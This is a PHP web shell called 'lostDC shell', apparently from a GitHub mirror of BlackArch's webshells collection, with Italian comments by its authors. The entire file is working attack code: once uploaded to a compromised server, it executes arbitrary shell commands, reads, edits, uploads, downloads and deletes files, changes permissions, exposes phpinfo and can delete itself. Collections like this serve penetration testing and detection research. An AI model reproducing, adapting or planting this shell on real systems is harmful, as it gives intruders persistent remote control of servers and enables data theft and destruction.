mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 06:14:16 +00:00
475 lines
19 KiB
PHP
475 lines
19 KiB
PHP
<?php
|
|
|
|
/* *
|
|
*
|
|
* lostDC shell
|
|
* PHP Shell scritta da lostpassword, D3vilc0de crew
|
|
* Rilasciata sotto licenza GPL 2009/2010
|
|
* Data rilascio: 25/12/2009 (eh si, il giorno di natale non avevo niente da fare)
|
|
* La Shell presenta varie funzioni, ma rimane comunque in continuo aggiornamento
|
|
*
|
|
* */
|
|
|
|
if (!function_exists("getTime")) {
|
|
function getTime() {
|
|
list($usec, $sec) = explode(" ", microtime());
|
|
return ((float)$usec + (float)$sec);
|
|
}
|
|
}
|
|
define("startTime",getTime());
|
|
|
|
if (!function_exists("shellexec")) {
|
|
function shellexec($cmd) {
|
|
global $disablefunc;
|
|
$result = "";
|
|
if (!empty($cmd)) {
|
|
if (is_callable("exec") and !in_array("exec",$disablefunc)) {
|
|
exec($cmd,$result);
|
|
$result = join("\n",$result);
|
|
} elseif (($result = `$cmd`) !== FALSE) {}
|
|
elseif (is_callable("system") and !in_array("system",$disablefunc)) {
|
|
$v = ob_get_contents();
|
|
ob_clean();
|
|
system($cmd);
|
|
$result = ob_get_contents();
|
|
ob_clean();
|
|
echo $v;
|
|
} elseif (is_resource($fp = popen($cmd,"r"))) {
|
|
$result = "";
|
|
while(!feof($fp)) {
|
|
$result .= fread($fp,1024);
|
|
}
|
|
pclose($fp);
|
|
}
|
|
}
|
|
return $result;
|
|
}
|
|
}
|
|
|
|
function getperms ($file) {
|
|
$perm = substr(sprintf('%o', fileperms($file)), -4);
|
|
return $perm;
|
|
}
|
|
|
|
if (!function_exists("view_size")) {
|
|
function view_size($size){
|
|
if (!is_numeric($size)) {
|
|
return FALSE;
|
|
} else {
|
|
if ($size >= 1073741824) {
|
|
/* Conversione da Byte a GigaByte */
|
|
$size = round($size/1073741824*100)/100 ." GB";
|
|
} elseif ($size >= 1048576) {
|
|
/* Conversione da Byte a MegaByte */
|
|
$size = round($size/1048576*100)/100 ." MB";
|
|
} elseif ($size >= 1024) {
|
|
/* Conversione da Byte a KiloByte */
|
|
$size = round($size/1024*100)/100 ." KB";
|
|
} else {
|
|
/* Byte */
|
|
$size = $size . " B";
|
|
}
|
|
return $size;
|
|
}
|
|
}
|
|
}
|
|
|
|
function getinfo()
|
|
{
|
|
$info = '';
|
|
$info .= '[~]Versione PHP: ' .phpversion() .'<br />';
|
|
$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
|
|
$info .= '[~]Indirizzo IP: ' .$_SERVER['SERVER_ADDR'] .'<br />';
|
|
$info .= '[~]Software: ' .$_SERVER['SERVER_SOFTWARE'].'<br />';
|
|
$info .= '[~]Charset: ' .$_SERVER['HTTP_ACCEPT_CHARSET'] . '<br />';
|
|
$info .= ((ini_get('safe_mode') == 0) ? '[~]Safe Mode: <font color="#00FF33">OFF</font><br />' : '[~]Safe Mode: <font color="#FF3300">OFF</font><br />');
|
|
$info .= ((ini_get('magic_quotes_gpc') == 0) ? '[~]Magic Quotes: <font color="#00FF33">OFF</font><br />' : '[~]Magic Quotes: <font color="#FF3300">ON</font><br />');
|
|
if (is_callable("disk_free_space")) {
|
|
$d = realpath(".");
|
|
$free = disk_free_space($d);
|
|
$total = disk_total_space($d);
|
|
if ($free === FALSE || $free < 0) {
|
|
$free = 0;
|
|
}
|
|
if ($total === FALSE || $total < 0) {
|
|
$total = 0;
|
|
}
|
|
$used = $total-$free;
|
|
$info .= "[~]Free space: ".view_size($free)."/".view_size($total)."<br />";
|
|
}
|
|
return $info;
|
|
}
|
|
|
|
if (!isset ($_GET ['dir'])){
|
|
$dir = getcwd ();
|
|
}
|
|
else {
|
|
$dir = $_GET ['dir'];
|
|
}
|
|
chdir ($dir);
|
|
|
|
$current = getcwd ();
|
|
$c = "?dir=" . $current;
|
|
|
|
$home = "<html>
|
|
<head>
|
|
<title>lostDC - ".$current."</title>
|
|
<style type=\"text/css\">
|
|
body {
|
|
color: #FFFFFF;
|
|
background-color: black;
|
|
font-family: Courier New, Verdana, Arial;
|
|
font-size: 11px;
|
|
cursor: crosshair;
|
|
}
|
|
a:link {
|
|
color: #FFFFFF;
|
|
text-decoration: none;
|
|
}
|
|
a:visited {
|
|
color: #FFFFFF;
|
|
text-decoration: none;
|
|
}
|
|
a:hover {
|
|
cursor: crosshair;
|
|
text-decoration: none;
|
|
color: #808080;
|
|
}
|
|
a.head {
|
|
text-decoration: none;
|
|
text-color: #FF0000;
|
|
}
|
|
a.head:hover {
|
|
cursor: crosshair;
|
|
text-decoration: none;
|
|
color: #FF0000;
|
|
}
|
|
table {
|
|
font-size: 11px;
|
|
}
|
|
td.list {
|
|
border: 1px solid white;
|
|
font-size: 11px;
|
|
}
|
|
td.list:hover {
|
|
background: #222;
|
|
}
|
|
#info {
|
|
font-size: 12px;
|
|
width: 50%;
|
|
margin-left: 20%;
|
|
text-align: left;
|
|
}
|
|
#foot {
|
|
font-size: 12px;
|
|
width: 65%;
|
|
margin-left: 20%;
|
|
text-align: left;
|
|
}
|
|
input:hover, textarea:hover {
|
|
background: #808080;
|
|
cursor: crosshair;
|
|
}
|
|
#perm {
|
|
color: #FF0000;
|
|
}
|
|
|
|
</style>
|
|
</head>
|
|
<body>";
|
|
|
|
print $home."<center><a href = \"".$_SERVER['PHP_SELF']."\"><img src = \"http://img367.imageshack.us/img367/9834/bannerdc2bygu.png\" border = \"none\"></a></center>";
|
|
print "<hr size=\"1\" width=\"60%\" noshade />\n<div id = \"info\">[~]Directory corrente: " . getcwd () . "<br />".getinfo()."</div>\n<hr size=\"1\" width=\"60%\" noshade />";
|
|
|
|
print "<table width = 60% height = 10% align = \"center\">\n";
|
|
print "<tr>\n";
|
|
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=create'>New</a> ]</td>\n";
|
|
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=phpinfo'>PHP Info</a> ]</td>\n";
|
|
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=nopaste&action=ins'>No-Paste</a> ]</td>\n";
|
|
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=execute'>Shell Command</a> ]</td>\n";
|
|
print "<td>[ <a class = \"head\" href = '" . $c . "&mode=hasher'>Hasher</a> ]</td>\n";
|
|
print "<td>[ <a class = \"head\" href = '" .$c . "&mode=selfremove'>Self Remove</a> ]</td>\n";
|
|
print "</tr></table><center>";
|
|
|
|
$mode = $_GET ['mode'];
|
|
switch ($mode) {
|
|
case "edit":
|
|
$file = $_GET ['file'];
|
|
$new = $_POST ['new'];
|
|
if (empty ($new)) {
|
|
$fp = fopen ($file , "r");
|
|
$cont = fread ($fp, filesize ($file));
|
|
$cont = str_replace ("<textarea>" , "<textarea>" , $cont);
|
|
print "<form action = '" . $c . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
|
|
print "File: ". $file . "<br />\n";
|
|
print "<textarea name = 'new' rows = '25' cols = '100'>" . $cont . "</textarea><br />\n";
|
|
print "<input type = 'submit' value = 'Edit'></form>\n";
|
|
}
|
|
else {
|
|
$fp = fopen ($file , "w");
|
|
if (fwrite ($fp , $new)) {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
}
|
|
else {
|
|
print "Impossibile editare " . $file . "<br />\n";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
|
|
}
|
|
}
|
|
fclose ($fp);
|
|
break;
|
|
case "upload":
|
|
$temp = $_FILES ['file'] ['tmp_name'];
|
|
$file = basename ($_FILES ['file'] ['name']);
|
|
if (!empty ($file)) {
|
|
if (move_uploaded_file ($temp , $file)) {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
}
|
|
else {
|
|
print "Impossibile caricare " . $file . "\n";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
|
|
}
|
|
}
|
|
break;
|
|
case "download":
|
|
$filename = $_GET['filename'];
|
|
header("Pragma: no-cache");
|
|
header("Expires: 0");
|
|
header ( "Content-type: application/octet-stream" );
|
|
header ( "Content-Disposition: attachment; filename=".$filename.";" );
|
|
header ( "Content-Description: Download manager" );
|
|
header ( "Content-Length: " . filesize ($filename) );
|
|
readfile ($filename);
|
|
break;
|
|
case "rename":
|
|
$old = $_GET ['old'];
|
|
print "<form action = '". $c . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
|
|
print "New name: <input name = 'new'><br />\n";
|
|
print "<input type = 'submit' value = 'Rename'></form>\n";
|
|
$new = $_POST ['new'];
|
|
if (!empty ($new)) {
|
|
if (rename ($old , $new)) {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
}
|
|
else {
|
|
print "Impossibile rinominare " . $old . ".<p>\n";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
|
|
}
|
|
}
|
|
break;
|
|
case "chmod":
|
|
if (chmod($_POST['tomod'], intval($_POST['mod'], 8)) == false) {
|
|
print "Impossibile cambiare i permessi a " .$_POST['tomod'] . "<br />";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
|
|
}
|
|
else {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
// print "".$_POST['tomod']." con permessi: ".intval($_POST['mod'], 8)." e' stato chmoddato\n";
|
|
}
|
|
break;
|
|
case "remove":
|
|
$file = $_GET ['file'];
|
|
if (unlink ($file)) {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
}
|
|
else {
|
|
print "Impossibile rimuovere " . $file . " <br />\n";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
|
|
}
|
|
break;
|
|
case "selfremove":
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir.'&mode=remove&file='.__FILE__);
|
|
break;
|
|
case "makedir":
|
|
if (mkdir($_POST['dir'], 0777) == false) {
|
|
print "Impossibile creare directory; " .$_POST['dir'] . " <br />\n";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
|
|
} else {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
|
|
}
|
|
break;
|
|
case "godir":
|
|
$goto = $_POST['goto'];
|
|
if (isset($_POST['goto'])) {
|
|
chdir($goto);
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].$c.'/'.$goto);
|
|
} else {
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
|
|
}
|
|
break;
|
|
case "elimina":
|
|
$dire = $_GET['dire'];
|
|
if ($handle = opendir($dire)) {
|
|
$array = array();
|
|
while (false != ($file = readdir($handle))) {
|
|
if ($file != "." && $file != "..") {
|
|
if(is_dir($dire.$file)) {
|
|
if(!rmdir($dire.$file)) {
|
|
delete_directory($dire.$file.'/');
|
|
}
|
|
}
|
|
else {
|
|
unlink($dire.$file);
|
|
}
|
|
}
|
|
}
|
|
closedir($handle);
|
|
rmdir($dire);
|
|
}
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
break;
|
|
case "create":
|
|
$new = $_POST ['new'];
|
|
if (isset($_POST['new'])) {
|
|
if (!empty ($new)) {
|
|
if ($fp = fopen ($new, "w")){
|
|
header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
|
|
}
|
|
else {
|
|
print "Impossibile creare " . $file . ".<p>\n";
|
|
echo "<a href=\"javascript:history.go(-1)\">Indietro</a></center><br /><br />\n";
|
|
}
|
|
fclose ($fp);
|
|
}
|
|
}
|
|
else {
|
|
print "<form action = '" . $c . "&mode=create' method = 'POST'>\n";
|
|
print "<tr><td>New file: <input name = 'new'></td>\n";
|
|
print "<td><input type = 'submit' value = 'Create'></td></tr></form>\n";
|
|
}
|
|
break;
|
|
case "nopaste":
|
|
switch ($_GET ['action']) {
|
|
case "ins":
|
|
print "<form action '" . $c . "&action=ins' method = 'POST'>\n";
|
|
print "Title: <input type = 'text' name = 'title'><br />\n";
|
|
print "Language: <input type = 'text' name = 'language'><br />\n";
|
|
print "Script: <br /><textarea name = 'source' rows = '30' cols = '50'></textarea><br />\n";
|
|
print "<input type = 'submit' value = 'Submit'></form>\n";
|
|
if (!empty ($_POST ['title']) && !empty ($_POST ['language']) && !empty ($_POST ['source']))
|
|
{
|
|
$file = rand (1000000, 9999999);
|
|
$fp = fopen ($file, "w");
|
|
fwrite ($fp, $_POST ['title'] . "\n" . $_POST ['language'] . "\n\n" . $_POST ['source']);
|
|
fclose ($fp);
|
|
header ("Location: {$c}&mode=nopaste&action=view&id={$file}");
|
|
}
|
|
break;
|
|
case "view":
|
|
$id = $_GET ['id'];
|
|
$fp = fopen ($id, "r");
|
|
$read = fread ($fp, filesize ($id));
|
|
print "<table border = '1'>\n<tr>\n<td>\n<pre>" . htmlentities ($read) . "</pre></td>\n</tr>\n</table>\n";
|
|
fclose ($fp);
|
|
break;
|
|
}
|
|
break;
|
|
case "execute":
|
|
$command = $_POST ['command'];
|
|
if (!isset ($_POST['command'])) {
|
|
print "<table>\n<form action = '" . $c . "&mode=execute' method = 'POST'>\n";
|
|
print "<tr>\n<td><input type = 'text' name = 'command'></td>\n</tr>\n";
|
|
print "<tr>\n<td><input type = 'submit' value = 'Execute'></td>\n</tr>\n</form>\n</table>";
|
|
}
|
|
else {
|
|
$ret = shellexec($command);
|
|
if ($ret == "") {
|
|
print "Il comando non puo' essere eseguito sul server<br /><br /><br />\n";
|
|
}
|
|
else {
|
|
print "Executing the following command:<br />\n";
|
|
print "<textarea rows = '5' cols = '60'>".$command."</textarea><br />\n";
|
|
print "Result:<br /> <textarea rows = '5' cols = '60'>".$ret."</textarea><br /><br /><br />\n";
|
|
}
|
|
}
|
|
break;
|
|
case "hasher":
|
|
print "<table>\n<form action = '" . $c . "&mode=hasher' method = 'POST'>\n";
|
|
print "<tr>\n<td><input type = 'text' name = 'hash'></td>\n</tr>\n";
|
|
print "<tr>\n<td><select name = 'type'>\n";
|
|
print "<option>md4</option>\n";
|
|
print "<option>md5</option>\n";
|
|
print "<option>sha1</option>\n";
|
|
print "<option>gost</option>\n";
|
|
print "<option>crc32</option>\n";
|
|
print "<option>adler32</option>\n";
|
|
print "<option>whirlpool</option>\n";
|
|
print "</select></td>\n</tr>";
|
|
print "<tr>\n<td><input type = 'submit' value = 'hash'></td>\n</tr></form>\n</table>";
|
|
if (!empty ($_POST ['hash']) && !empty ($_POST ['type'])) {
|
|
print $_POST ['hash'] . ": " . "<b>" . hash ($_POST ['type'], $_POST ['hash']) . "</b>";
|
|
}
|
|
break;
|
|
case "phpinfo":
|
|
phpinfo();
|
|
break;
|
|
default:
|
|
print "<table style = \"border: 1px solid black;\" width=\"60%\">\n";
|
|
$files = scandir ($dir);
|
|
foreach ($files as $out) {
|
|
if (is_file ($out)) {
|
|
|
|
print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " .$c ."&mode=download&filename=".$out.">" . $out ."</a></td>\n";
|
|
print "<td width = \"10%\" class = \"list\">".view_size(filesize($out))."</td>";
|
|
print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
|
|
print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=edit&file=" . $out . "'><img src = 'http://img189.imageshack.us/img189/9858/editj.gif' alt = \"edita file\" border = \"none\"></a>
|
|
<a href = '" . $c ."&mode=remove&file=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina file\" border = \"none\"></a>
|
|
<a href = '" . $c ."&mode=rename&old=" . $out . "'><img src = 'http://img51.imageshack.us/img51/7241/replyl.gif' alt = \"rinomina file\" border = \"none\"></a>
|
|
</td>\n</tr>";
|
|
}
|
|
else {
|
|
if ($out != "." && $out != "..") {
|
|
print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">" . $out . "</a></td>\n";
|
|
print "<td width = \"10%\" class = \"list\">FOLDER</td>";
|
|
print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
|
|
print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=elimina&dire=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina directory\" border = \"none\"></a></td>\n</tr>";
|
|
}
|
|
if ($out == "..")
|
|
print "<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">..</a></td>\n";
|
|
}
|
|
}
|
|
print "</table>\n";
|
|
}
|
|
|
|
print "</center>\n<hr size=\"1\" width=\"60%\" noshade />";
|
|
print "\n</hr>";
|
|
print "<table id = \"foot\">
|
|
<tr>
|
|
<td width = \"40%\">
|
|
<form action = '" . $c . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>
|
|
Upload file: <input type = 'file' name = 'file'>
|
|
<input type = 'submit' value = 'Upload'>
|
|
</form>
|
|
</td>
|
|
<td width = \"50%\">
|
|
<form method=\"POST\" action=\"".$c."&mode=chmod\">
|
|
Chmod File: <input type=\"text\" name=\"tomod\" value = \"filename\">
|
|
<input type=\"number\" name=\"mod\" value = \"0666\">
|
|
<input type=\"submit\" name=\"submit\" value=\"Chmod\">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td width = \"40%\">
|
|
<form method=\"POST\" action=\"?dir='.$c.'&mode=makedir\">
|
|
Mkdir: <input type=\"text\" name=\"dir\" value=\"namedir\">
|
|
<input type=\"submit\" name=\"submit\" value=\"Create\">
|
|
</form>
|
|
</td>
|
|
<td width = \"50%\">
|
|
<form action = '" . $c . "&mode=create' method = 'POST'>
|
|
New file: <input name = 'new'>
|
|
<input type = 'submit' value = 'Create'></form>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
<form method = \"POST\" action = \"?dir='.$c.'&mode=godir\">
|
|
Go dir: <input name = 'goto'>
|
|
<input type = 'submit' value = 'Go'>
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table><hr size=\"1\" width=\"60%\" noshade />\n</hr>";
|
|
print "<center>[ Generation time: ".round(getTime()-startTime,4)." seconds | by <a href=\"http://lostpassword.hellospace.net\">lostpassword</a> and <a href = \"http://www.d3vilc0de.org\">D3vilc0de crew</a> ]</center>\n</body>\n</html>";
|
|
|
|
?>
|